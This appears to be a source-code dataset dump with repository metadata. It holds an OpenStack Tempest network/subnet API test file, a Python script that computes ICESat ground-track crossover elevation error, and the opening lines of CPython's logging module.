def test_create_delete_stateless_subnet_with_ports(self):
"""Test deleting subnet with DHCPv6 stateless ports
Create subnet with DHCPv6 stateless, create ports in network
and then you shall be able to delete subnet without port
deletion. But you still can not delete the network.
"""
self._test_delete_subnet_with_ports("dhcpv6-stateless")
| 44.964561
| 79
| 0.628675
|
import itertools
import netaddr
import six
from tempest_lib import exceptions as lib_exc
from tempest.api.network import base
from tempest.common import custom_matchers
from tempest.common.utils import data_utils
from tempest import config
from tempest import test
CONF = config.CONF
class NetworksTest(base.BaseNetworkTest):
@classmethod
def resource_setup(cls):
super(NetworksTest, cls).resource_setup()
cls.network = cls.create_network()
cls.name = cls.network['name']
cls.subnet = cls._create_subnet_with_last_subnet_block(cls.network,
cls._ip_version)
cls._subnet_data = {6: {'gateway':
str(cls._get_gateway_from_tempest_conf(6)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(6),
'dns_nameservers': ['2001:4860:4860::8844',
'2001:4860:4860::8888'],
'host_routes': [{'destination': '2001::/64',
'nexthop': '2003::1'}],
'new_host_routes': [{'destination':
'2001::/64',
'nexthop': '2005::1'}],
'new_dns_nameservers':
['2001:4860:4860::7744',
'2001:4860:4860::7888']},
4: {'gateway':
str(cls._get_gateway_from_tempest_conf(4)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(4),
'dns_nameservers': ['8.8.4.4', '8.8.8.8'],
'host_routes': [{'destination': '10.20.0.0/32',
'nexthop': '10.100.1.1'}],
'new_host_routes': [{'destination':
'10.20.0.0/32',
'nexthop':
'10.100.1.2'}],
'new_dns_nameservers': ['7.8.8.8', '7.8.4.4']}}
@classmethod
def _create_subnet_with_last_subnet_block(cls, network, ip_version):
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
subnet_cidr = list(cidr.subnet(mask_bits))[-1]
gateway_ip = str(netaddr.IPAddress(subnet_cidr) + 1)
return cls.create_subnet(network, gateway=gateway_ip,
cidr=subnet_cidr, mask_bits=mask_bits)
@classmethod
def _get_gateway_from_tempest_conf(cls, ip_version):
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
if mask_bits >= cidr.prefixlen:
return netaddr.IPAddress(cidr) + 1
else:
for subnet in cidr.subnet(mask_bits):
return netaddr.IPAddress(subnet) + 1
@classmethod
def _get_allocation_pools_from_gateway(cls, ip_version):
gateway = cls._get_gateway_from_tempest_conf(ip_version)
return [{'start': str(gateway + 2), 'end': str(gateway + 3)}]
def subnet_dict(self, include_keys):
return dict((key, self._subnet_data[self._ip_version][key])
for key in include_keys)
def _compare_resource_attrs(self, actual, expected):
exclude_keys = set(actual).symmetric_difference(expected)
self.assertThat(actual, custom_matchers.MatchesDictExceptForKeys(
expected, exclude_keys))
def _delete_network(self, network):
self.networks_client.delete_network(network['id'])
if network in self.networks:
self.networks.remove(network)
for subnet in self.subnets:
if subnet['network_id'] == network['id']:
self.subnets.remove(subnet)
def _create_verify_delete_subnet(self, cidr=None, mask_bits=None,
**kwargs):
network = self.create_network()
net_id = network['id']
gateway = kwargs.pop('gateway', None)
subnet = self.create_subnet(network, gateway, cidr, mask_bits,
**kwargs)
compare_args_full = dict(gateway_ip=gateway, cidr=cidr,
mask_bits=mask_bits, **kwargs)
compare_args = dict((k, v) for k, v in six.iteritems(compare_args_full)
if v is not None)
if 'dns_nameservers' in set(subnet).intersection(compare_args):
self.assertEqual(sorted(compare_args['dns_nameservers']),
sorted(subnet['dns_nameservers']))
del subnet['dns_nameservers'], compare_args['dns_nameservers']
self._compare_resource_attrs(subnet, compare_args)
self.networks_client.delete_network(net_id)
self.networks.pop()
self.subnets.pop()
@test.attr(type='smoke')
@test.idempotent_id('0e269138-0da6-4efc-a46d-578161e7b221')
def test_create_update_delete_network_subnet(self):
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
self.addCleanup(self._delete_network, network)
net_id = network['id']
self.assertEqual('ACTIVE', network['status'])
new_name = "New_network"
body = self.networks_client.update_network(net_id, name=new_name)
updated_net = body['network']
self.assertEqual(updated_net['name'], new_name)
subnet = self.create_subnet(network)
subnet_id = subnet['id']
new_name = "New_subnet"
body = self.subnets_client.update_subnet(subnet_id, name=new_name)
updated_subnet = body['subnet']
self.assertEqual(updated_subnet['name'], new_name)
@test.attr(type='smoke')
@test.idempotent_id('2bf13842-c93f-4a69-83ed-717d2ec3b44e')
def test_show_network(self):
body = self.networks_client.show_network(self.network['id'])
network = body['network']
for key in ['id', 'name']:
self.assertEqual(network[key], self.network[key])
@test.idempotent_id('867819bb-c4b6-45f7-acf9-90edcf70aa5e')
def test_show_network_fields(self):
fields = ['id', 'name']
body = self.networks_client.show_network(self.network['id'],
fields=fields)
network = body['network']
self.assertEqual(sorted(network.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(network[field_name], self.network[field_name])
@test.attr(type='smoke')
@test.idempotent_id('f7ffdeda-e200-4a7a-bcbe-05716e86bf43')
def test_list_networks(self):
body = self.networks_client.list_networks()
networks = [network['id'] for network in body['networks']
if network['id'] == self.network['id']]
self.assertNotEmpty(networks, "Created network not found in the list")
@test.idempotent_id('6ae6d24f-9194-4869-9c85-c313cb20e080')
def test_list_networks_fields(self):
fields = ['id', 'name']
body = self.networks_client.list_networks(fields=fields)
networks = body['networks']
self.assertNotEmpty(networks, "Network list returned is empty")
for network in networks:
self.assertEqual(sorted(network.keys()), sorted(fields))
@test.attr(type='smoke')
@test.idempotent_id('bd635d81-6030-4dd1-b3b9-31ba0cfdf6cc')
def test_show_subnet(self):
body = self.subnets_client.show_subnet(self.subnet['id'])
subnet = body['subnet']
self.assertNotEmpty(subnet, "Subnet returned has no fields")
for key in ['id', 'cidr']:
self.assertIn(key, subnet)
self.assertEqual(subnet[key], self.subnet[key])
@test.idempotent_id('270fff0b-8bfc-411f-a184-1e8fd35286f0')
def test_show_subnet_fields(self):
fields = ['id', 'network_id']
body = self.subnets_client.show_subnet(self.subnet['id'],
fields=fields)
subnet = body['subnet']
self.assertEqual(sorted(subnet.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(subnet[field_name], self.subnet[field_name])
@test.attr(type='smoke')
@test.idempotent_id('db68ba48-f4ea-49e9-81d1-e367f6d0b20a')
def test_list_subnets(self):
body = self.subnets_client.list_subnets()
subnets = [subnet['id'] for subnet in body['subnets']
if subnet['id'] == self.subnet['id']]
self.assertNotEmpty(subnets, "Created subnet not found in the list")
@test.idempotent_id('842589e3-9663-46b0-85e4-7f01273b0412')
def test_list_subnets_fields(self):
fields = ['id', 'network_id']
body = self.subnets_client.list_subnets(fields=fields)
subnets = body['subnets']
self.assertNotEmpty(subnets, "Subnet list returned is empty")
for subnet in subnets:
self.assertEqual(sorted(subnet.keys()), sorted(fields))
def _try_delete_network(self, net_id):
try:
self.networks_client.delete_network(net_id)
except lib_exc.NotFound:
pass
@test.idempotent_id('f04f61a9-b7f3-4194-90b2-9bcf660d1bfe')
def test_delete_network_with_subnet(self):
name = data_utils.rand_name('network-')
body = self.networks_client.create_network(name=name)
network = body['network']
net_id = network['id']
self.addCleanup(self._try_delete_network, net_id)
subnet = self.create_subnet(network)
subnet_id = subnet['id']
body = self.networks_client.delete_network(net_id)
self.assertRaises(lib_exc.NotFound, self.subnets_client.show_subnet,
subnet_id)
self.subnets.pop()
@test.idempotent_id('d2d596e2-8e76-47a9-ac51-d4648009f4d3')
def test_create_delete_subnet_without_gateway(self):
self._create_verify_delete_subnet()
@test.idempotent_id('9393b468-186d-496d-aa36-732348cd76e7')
def test_create_delete_subnet_with_gw(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['gateway']))
@test.idempotent_id('bec949c4-3147-4ba6-af5f-cd2306118404')
def test_create_delete_subnet_with_allocation_pools(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['allocation_pools']))
@test.idempotent_id('8217a149-0c6c-4cfb-93db-0486f707d13f')
def test_create_delete_subnet_with_gw_and_allocation_pools(self):
self._create_verify_delete_subnet(**self.subnet_dict(
['gateway', 'allocation_pools']))
@test.idempotent_id('d830de0a-be47-468f-8f02-1fd996118289')
def test_create_delete_subnet_with_host_routes_and_dns_nameservers(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['host_routes', 'dns_nameservers']))
@test.idempotent_id('94ce038d-ff0a-4a4c-a56b-09da3ca0b55d')
def test_create_delete_subnet_with_dhcp_enabled(self):
self._create_verify_delete_subnet(enable_dhcp=True)
@test.idempotent_id('3d3852eb-3009-49ec-97ac-5ce83b73010a')
def test_update_subnet_gw_dns_host_routes_dhcp(self):
network = self.create_network()
self.addCleanup(self._delete_network, network)
subnet = self.create_subnet(
network, **self.subnet_dict(['gateway', 'host_routes',
'dns_nameservers',
'allocation_pools']))
subnet_id = subnet['id']
new_gateway = str(netaddr.IPAddress(
self._subnet_data[self._ip_version]['gateway']) + 1)
new_host_routes = self._subnet_data[self._ip_version][
'new_host_routes']
new_dns_nameservers = self._subnet_data[self._ip_version][
'new_dns_nameservers']
kwargs = {'host_routes': new_host_routes,
'dns_nameservers': new_dns_nameservers,
'gateway_ip': new_gateway, 'enable_dhcp': True}
new_name = "New_subnet"
body = self.subnets_client.update_subnet(subnet_id, name=new_name,
**kwargs)
updated_subnet = body['subnet']
kwargs['name'] = new_name
self.assertEqual(sorted(updated_subnet['dns_nameservers']),
sorted(kwargs['dns_nameservers']))
del subnet['dns_nameservers'], kwargs['dns_nameservers']
self._compare_resource_attrs(updated_subnet, kwargs)
@test.idempotent_id('a4d9ec4c-0306-4111-a75c-db01a709030b')
def test_create_delete_subnet_all_attributes(self):
self._create_verify_delete_subnet(
enable_dhcp=True,
**self.subnet_dict(['gateway', 'host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('af774677-42a9-4e4b-bb58-16fe6a5bc1ec')
def test_external_network_visibility(self):
body = self.networks_client.list_networks(**{'router:external': True})
networks = [network['id'] for network in body['networks']]
self.assertNotEmpty(networks, "No external networks found")
nonexternal = [net for net in body['networks'] if
not net['router:external']]
self.assertEmpty(nonexternal, "Found non-external networks"
" in filtered list (%s)." % nonexternal)
self.assertIn(CONF.network.public_network_id, networks)
subnets_iter = (network['subnets']
for network in body['networks']
if not network['shared'])
public_subnets_iter = itertools.chain(*subnets_iter)
body = self.subnets_client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['id'] in public_subnets_iter]
self.assertEmpty(subnets, "Public subnets visible")
class BulkNetworkOpsTestJSON(base.BaseNetworkTest):
def _delete_networks(self, created_networks):
for n in created_networks:
self.networks_client.delete_network(n['id'])
body = self.networks_client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertNotIn(n['id'], networks_list)
def _delete_subnets(self, created_subnets):
for n in created_subnets:
self.subnets_client.delete_subnet(n['id'])
body = self.subnets_client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertNotIn(n['id'], subnets_list)
def _delete_ports(self, created_ports):
for n in created_ports:
self.ports_client.delete_port(n['id'])
body = self.ports_client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertNotIn(n['id'], ports_list)
@test.attr(type='smoke')
@test.idempotent_id('d4f9024d-1e28-4fc1-a6b1-25dbc6fa11e2')
def test_bulk_create_delete_network(self):
network_list = [{'name': data_utils.rand_name('network-')},
{'name': data_utils.rand_name('network-')}]
body = self.client.create_bulk_network(networks=network_list)
created_networks = body['networks']
self.addCleanup(self._delete_networks, created_networks)
body = self.networks_client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], networks_list)
@test.attr(type='smoke')
@test.idempotent_id('8936533b-c0aa-4f29-8e53-6cc873aec489')
def test_bulk_create_delete_subnet(self):
networks = [self.create_network(), self.create_network()]
if self._ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
else:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
names = [data_utils.rand_name('subnet-') for i in range(len(networks))]
subnets_list = []
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'cidr': str(cidrs[(i)]),
'name': names[i],
'ip_version': self._ip_version
}
subnets_list.append(p1)
del subnets_list[1]['name']
body = self.client.create_bulk_subnet(subnets=subnets_list)
created_subnets = body['subnets']
self.addCleanup(self._delete_subnets, created_subnets)
body = self.subnets_client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], subnets_list)
@test.attr(type='smoke')
@test.idempotent_id('48037ff2-e889-4c3b-b86a-8e3f34d2d060')
def test_bulk_create_delete_port(self):
networks = [self.create_network(), self.create_network()]
names = [data_utils.rand_name('port-') for i in range(len(networks))]
port_list = []
state = [True, False]
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'name': names[i],
'admin_state_up': state[i],
}
port_list.append(p1)
del port_list[1]['name']
body = self.client.create_bulk_port(ports=port_list)
created_ports = body['ports']
self.addCleanup(self._delete_ports, created_ports)
body = self.ports_client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], ports_list)
class BulkNetworkOpsIpV6TestJSON(BulkNetworkOpsTestJSON):
_ip_version = 6
class NetworksIpV6TestJSON(NetworksTest):
_ip_version = 6
@test.idempotent_id('e41a4888-65a6-418c-a095-f7c2ef4ad59a')
def test_create_delete_subnet_with_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway = str(netaddr.IPAddress(net.first + 2))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network, gateway)
self.assertEqual(subnet['gateway_ip'], gateway)
@test.idempotent_id('ebb4fd95-524f-46af-83c1-0305b239338f')
def test_create_delete_subnet_with_default_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway_ip = str(netaddr.IPAddress(net.first + 1))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network)
self.assertEqual(subnet['gateway_ip'], gateway_ip)
@test.idempotent_id('a9653883-b2a4-469b-8c3c-4518430a7e55')
def test_create_list_subnet_with_no_gw64_one_network(self):
name = data_utils.rand_name('network-')
network = self.create_network(name)
ipv6_gateway = self.subnet_dict(['gateway'])['gateway']
subnet1 = self.create_subnet(network,
ip_version=6,
gateway=ipv6_gateway)
self.assertEqual(netaddr.IPNetwork(subnet1['cidr']).version, 6,
'The created subnet is not IPv6')
subnet2 = self.create_subnet(network,
gateway=None,
ip_version=4)
self.assertEqual(netaddr.IPNetwork(subnet2['cidr']).version, 4,
'The created subnet is not IPv4')
self.assertEqual(subnet1['gateway_ip'], ipv6_gateway)
self.assertEqual(subnet2['gateway_ip'], None)
body = self.subnets_client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['network_id'] == network['id']]
test_subnet_ids = [sub['id'] for sub in (subnet1, subnet2)]
        self.assertItemsEqual(subnets,
                              test_subnet_ids,
                              'Subnets are not in the same network')
class NetworksIpV6TestAttrs(NetworksIpV6TestJSON):
@classmethod
def skip_checks(cls):
super(NetworksIpV6TestAttrs, cls).skip_checks()
if not CONF.network_feature_enabled.ipv6_subnet_attributes:
raise cls.skipException("IPv6 extended attributes for "
"subnets not available")
@test.idempotent_id('da40cd1b-a833-4354-9a85-cd9b8a3b74ca')
def test_create_delete_subnet_with_v6_attributes_stateful(self):
self._create_verify_delete_subnet(
gateway=self._subnet_data[self._ip_version]['gateway'],
ipv6_ra_mode='dhcpv6-stateful',
ipv6_address_mode='dhcpv6-stateful')
@test.idempotent_id('176b030f-a923-4040-a755-9dc94329e60c')
def test_create_delete_subnet_with_v6_attributes_slaac(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='slaac',
ipv6_address_mode='slaac')
@test.idempotent_id('7d410310-8c86-4902-adf9-865d08e31adb')
def test_create_delete_subnet_with_v6_attributes_stateless(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='dhcpv6-stateless',
ipv6_address_mode='dhcpv6-stateless')
def _test_delete_subnet_with_ports(self, mode):
slaac_network = self.create_network()
subnet_slaac = self.create_subnet(slaac_network,
**{'ipv6_ra_mode': mode,
'ipv6_address_mode': mode})
port = self.create_port(slaac_network)
self.assertIsNotNone(port['fixed_ips'][0]['ip_address'])
self.subnets_client.delete_subnet(subnet_slaac['id'])
self.subnets.pop()
subnets = self.subnets_client.list_subnets()
subnet_ids = [subnet['id'] for subnet in subnets['subnets']]
self.assertNotIn(subnet_slaac['id'], subnet_ids,
"Subnet wasn't deleted")
self.assertRaisesRegexp(
lib_exc.Conflict,
"There are one or more ports still in use on the network",
self.networks_client.delete_network,
slaac_network['id'])
@test.idempotent_id('88554555-ebf8-41ef-9300-4926d45e06e9')
def test_create_delete_slaac_subnet_with_ports(self):
self._test_delete_subnet_with_ports("slaac")
@test.idempotent_id('2de6ab5a-fcf0-4144-9813-f91a940291f1')
def test_create_delete_stateless_subnet_with_ports(self):
self._test_delete_subnet_with_ports("dhcpv6-stateless")
| true
| true
|
1c446f764905e7f9cd9f67b56684fdeee3bc714c
| 5,348
|
py
|
Python
|
crossover_finder.py
|
nbergam2021/ICESat_data_analysis_tools
|
46f4132d2b34efe9a21470cdbaddf195301cfcd3
|
[
"MIT"
] | 1
|
2019-11-27T20:41:31.000Z
|
2019-11-27T20:41:31.000Z
|
crossover_finder.py
|
nbergam2021/ICESat_data_analysis_tools
|
46f4132d2b34efe9a21470cdbaddf195301cfcd3
|
[
"MIT"
] | null | null | null |
crossover_finder.py
|
nbergam2021/ICESat_data_analysis_tools
|
46f4132d2b34efe9a21470cdbaddf195301cfcd3
|
[
"MIT"
] | null | null | null |
#crossover_finder.py
import numpy as np
import pandas as pd
import scipy.stats as stats
import glob
import os
import sys
def solve(line_list, box):
    # input: a list of lines, each in slope/intercept form [slope, intercept, ...]
    # output: a set of (x, y) intersection points
    # Only lines with opposing slopes can cross within the region of interest.
    # box is a list of the bounding lat/lon values:
    # 0 is left, 1 is right, 2 is top, 3 is bottom
    intersects = []
    # iterate over index pairs so each unordered pair is compared exactly once;
    # the original removed items from line_list while looping over it, which
    # silently skipped some comparisons
    for idx, i in enumerate(line_list):
        for j in line_list[idx + 1:]:
            # if lines have opposing slopes
            if i[0]*j[0] < 0: #assuming slope is index 0
                intersects.append(get_intersect(i, j))
    for i in intersects:
        # checks if the point is out of range; the removal is still disabled,
        # as in the original, so this loop currently has no effect
        if i[0] < box[0] or i[0] > box[1] or i[1] > box[2] or i[1] < box[3]:
            #intersects.remove(i)
            pass
    return set(intersects)
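# A minimal usage sketch (hypothetical values, illustration only): the
# ascending track y = 2x + 1 and the descending track y = -x + 4 cross
# exactly once, at (1.0, 3.0), inside the box [left, right, top, bottom].
def _example_solve():
    assert solve([[2, 1], [-1, 4]], [0, 10, 10, 0]) == {(1.0, 3.0)}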
def get_intersect(line1, line2):
    # each line is in slope/intercept form => [slope, intercept]
    x = round( (line2[1]-line1[1]) / (line1[0]-line2[0]) , 3)
    y = round( line1[0]*x + line1[1] , 3)
    return (x, y)
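# A minimal usage sketch (hypothetical values): y = 2x + 1 meets y = -x + 4
# where 2x + 1 = -x + 4, i.e. at x = 1, y = 3.
def _example_get_intersect():
    assert get_intersect([2, 1], [-1, 4]) == (1.0, 3.0)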
def get_error(alt):
df = pd.DataFrame(columns=['Number of Points', 'Range',
'Standard Deviation', 'Variance']) #initializes dataframe
for point in alt:
#appends each set of # of points, range, stdvar, and variance
if len(point) > 0:
df = df.append(dict(zip(df.columns,
[len(point), (np.max(np.array(point))-np.min(np.array(point))),
np.std(point), np.var(point)])), ignore_index=True)
return df
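# A minimal usage sketch (hypothetical values; assumes a pandas version that
# still provides DataFrame.append, as used above): two crossovers with three
# and two elevation samples produce one error row apiece.
def _example_get_error():
    stats_df = get_error([[10.0, 10.4, 10.2], [5.0, 5.5]])
    assert list(stats_df['Number of Points']) == [3, 2]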
def magn(vector):
for i in range(len(vector)):
if vector[i] is None or vector[i] == np.inf or vector[i] == np.NINF:
vector[i] = 0
mag = np.sqrt(vector.dot(vector))
return mag
def lerp(lower, higher, intr):
diff = np.subtract(higher, lower)
if np.prod(diff[0:2]) == 0:
return None
magdiff = magn(diff[0:2])
intr_diff = np.subtract(intr, lower[0:2])
magintr = magn(intr_diff)
mag = magintr/magdiff
if mag>1:
return None
lerped = np.add(lower, mag * diff)
veri_diff = np.absolute(np.subtract(intr, lerped[0:2]))
veri = np.sqrt(veri_diff.dot(veri_diff))
#print("lower: ({0},{1}), higher: ({2},{3}), intr: ({4},{5}), veri: {6}".format(lower[0], lower[1], higher[0], higher[1], intr[0], intr[1], veri))
if veri < 50:
return lerped[2]
return None
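# A minimal usage sketch (hypothetical values): interpolating halfway along a
# track from (0, 0, elev 100) to (10, 10, elev 110) at the crossover (5, 5)
# returns the interpolated elevation 105.0.
def _example_lerp():
    lower = np.array([0.0, 0.0, 100.0])
    higher = np.array([10.0, 10.0, 110.0])
    assert lerp(lower, higher, (5.0, 5.0)) == 105.0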
def xovers(sort_list, line_list, intersections):
xovers = [] #initializes an empty array to store crossovers
for intr in intersections:
points = [] #initializes an array to store points at a crossover
for df in sort_list:
index = df.iloc[:,0].searchsorted(intr[0]) #gets ideal index
if index == 0: #accounts for out of bounding box point placement
lower = df.iloc[index,:] #sets lower bound of possible point
else:
lower = df.iloc[index-1,:] #sets lower bound of possible point
if index >= len(df.iloc[:,0]):
higher = df.iloc[index-1,:] #sets upper bound of possible point
else:
higher = df.iloc[index,:] #sets upper bound of possible point
#print("ideal x: {0}, low x: {1}, high x: {2}".format(intr[0], lower[0], higher[0]))
l = lerp(lower, higher, intr)
if l is not None:
points.append(l)
xovers.append(points) #appends points array to xovers
return xovers
def xover_error(file):
df_total = pd.read_csv(file, header=None) #saves complete dataframe O(n)
df_list = [group for _, group in df_total.groupby(3)] #separates dataframe by ground track O(n)
line_list = [stats.linregress(df.iloc[:,0],df.iloc[:,1])[0:2] for df in df_list] #creates a list of regression lines
intersections = solve(line_list, [np.min(np.array(df_total.iloc[:,0])), \
np.max(np.array(df_total.iloc[:,0])), np.max(np.array(df_total.iloc[:,1])), \
np.min(np.array(df_total.iloc[:,1]))]) #finds potential intersections
sorted_list = [df.sort_values(by=df.columns[0], kind='mergesort') for df in df_list] #sorts dataframes for binary search O(nlog(n))
xover_list = xovers(sorted_list, line_list, intersections) #creates a list of crossovers
error_data = get_error(xover_list) #creates a datframe of error
new_name = os.path.splitext(file)[0] + "_crossover_error.csv" #modifies original filename
error_data.to_csv(new_name, index=False) #saves csv to file of name new_name
return error_data, new_name #returns saved dataframe and new filename
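# Assumed input layout (inferred from the column indices used above, not
# documented in the original): a headerless CSV where column 0 is x (e.g.
# longitude), column 1 is y (latitude), column 2 is elevation, and column 3
# is a ground-track identifier used to split the dataframe.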
def main():
input_length = len(sys.argv) #saves length of command line input
if input_length <= 1:
print ("please input a filepath") #gives error message for lack of input
else:
        regex = sys.argv[1] #saves the filename glob pattern (despite the name, not a regex)
file_list = glob.glob(regex) #saves list of filenames
i = 1 #variable for saving current position in list
for file in file_list:
output = xover_error(file) #saves new csv file and saves method output
print ("Saved new csv file with path: " + output[1])
print ("Output {0} of {1}".format(i, len(file_list)))
i+=1 #increases i to new index
if __name__ == "__main__":
main()
| 40.515152
| 150
| 0.619484
|
import numpy as np
import pandas as pd
import scipy.stats as stats
import glob
import os
import sys
def solve(line_list, box):
    intersects = []
    for idx, i in enumerate(line_list):
        for j in line_list[idx + 1:]:
            if i[0]*j[0] < 0:
                intersects.append(get_intersect(i, j))
    for i in intersects:
        if i[0] < box[0] or i[0] > box[1] or i[1] > box[2] or i[1] < box[3]:
            pass
    return set(intersects)
def get_intersect(line1, line2):
    x = round( (line2[1]-line1[1]) / (line1[0]-line2[0]) , 3)
    y = round( line1[0]*x + line1[1] , 3)
    return (x, y)
def get_error(alt):
df = pd.DataFrame(columns=['Number of Points', 'Range',
'Standard Deviation', 'Variance'])
    for point in alt:
        if len(point) > 0:
            df = df.append(dict(zip(df.columns,
            [len(point), (np.max(np.array(point))-np.min(np.array(point))),
            np.std(point), np.var(point)])), ignore_index=True)
return df
def magn(vector):
for i in range(len(vector)):
if vector[i] is None or vector[i] == np.inf or vector[i] == np.NINF:
vector[i] = 0
mag = np.sqrt(vector.dot(vector))
return mag
def lerp(lower, higher, intr):
diff = np.subtract(higher, lower)
if np.prod(diff[0:2]) == 0:
return None
magdiff = magn(diff[0:2])
intr_diff = np.subtract(intr, lower[0:2])
magintr = magn(intr_diff)
mag = magintr/magdiff
if mag>1:
return None
lerped = np.add(lower, mag * diff)
veri_diff = np.absolute(np.subtract(intr, lerped[0:2]))
veri = np.sqrt(veri_diff.dot(veri_diff))
if veri < 50:
return lerped[2]
return None
def xovers(sort_list, line_list, intersections):
xovers = []
for intr in intersections:
points = []
for df in sort_list:
index = df.iloc[:,0].searchsorted(intr[0])
if index == 0:
lower = df.iloc[index,:]
else:
lower = df.iloc[index-1,:]
if index >= len(df.iloc[:,0]):
higher = df.iloc[index-1,:]
else:
higher = df.iloc[index,:]
l = lerp(lower, higher, intr)
if l is not None:
points.append(l)
xovers.append(points)
return xovers
def xover_error(file):
df_total = pd.read_csv(file, header=None)
df_list = [group for _, group in df_total.groupby(3)]
line_list = [stats.linregress(df.iloc[:,0],df.iloc[:,1])[0:2] for df in df_list]
intersections = solve(line_list, [np.min(np.array(df_total.iloc[:,0])), \
np.max(np.array(df_total.iloc[:,0])), np.max(np.array(df_total.iloc[:,1])), \
np.min(np.array(df_total.iloc[:,1]))])
sorted_list = [df.sort_values(by=df.columns[0], kind='mergesort') for df in df_list]
xover_list = xovers(sorted_list, line_list, intersections)
error_data = get_error(xover_list)
new_name = os.path.splitext(file)[0] + "_crossover_error.csv"
error_data.to_csv(new_name, index=False)
return error_data, new_name
def main():
input_length = len(sys.argv)
if input_length <= 1:
print ("please input a filepath")
else:
regex = sys.argv[1]
file_list = glob.glob(regex)
i = 1
for file in file_list:
output = xover_error(file)
print ("Saved new csv file with path: " + output[1])
print ("Output {0} of {1}".format(i, len(file_list)))
i+=1
if __name__ == "__main__":
main()
| true
| true
|
1c446fd421650543e773be63c70c4dc902f1eb7a
| 78,556
|
py
|
Python
|
Lib/logging/__init__.py
|
KrishnaSai2020/cpython
|
07923f32b16ba39165a58a5f47e807ca04ae17aa
|
[
"CNRI-Python-GPL-Compatible"
] | 2
|
2020-06-22T07:22:12.000Z
|
2020-09-29T06:33:22.000Z
|
Lib/logging/__init__.py
|
jugmac00/cpython
|
2c2a4f3d8545784c6e4ca8128bfc706916080712
|
[
"CNRI-Python-GPL-Compatible"
] | null | null | null |
Lib/logging/__init__.py
|
jugmac00/cpython
|
2c2a4f3d8545784c6e4ca8128bfc706916080712
|
[
"CNRI-Python-GPL-Compatible"
] | null | null | null |
# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Logging package for Python. Based on PEP 282 and comments thereto in
comp.lang.python.
Copyright (C) 2001-2019 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging' and log away!
"""
import sys, os, time, io, re, traceback, warnings, weakref, collections.abc
from string import Template
from string import Formatter as StrFormatter
__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',
'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',
'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',
'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',
'captureWarnings', 'critical', 'debug', 'disable', 'error',
'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',
'info', 'log', 'makeLogRecord', 'setLoggerClass', 'shutdown',
'warn', 'warning', 'getLogRecordFactory', 'setLogRecordFactory',
'lastResort', 'raiseExceptions']
import threading
__author__ = "Vinay Sajip <vinay_sajip@red-dove.com>"
__status__ = "production"
# The following module attributes are no longer updated.
__version__ = "0.5.1.2"
__date__ = "07 February 2010"
#---------------------------------------------------------------------------
# Miscellaneous module data
#---------------------------------------------------------------------------
#
#_startTime is used as the base when calculating the relative time of events
#
_startTime = time.time()
#
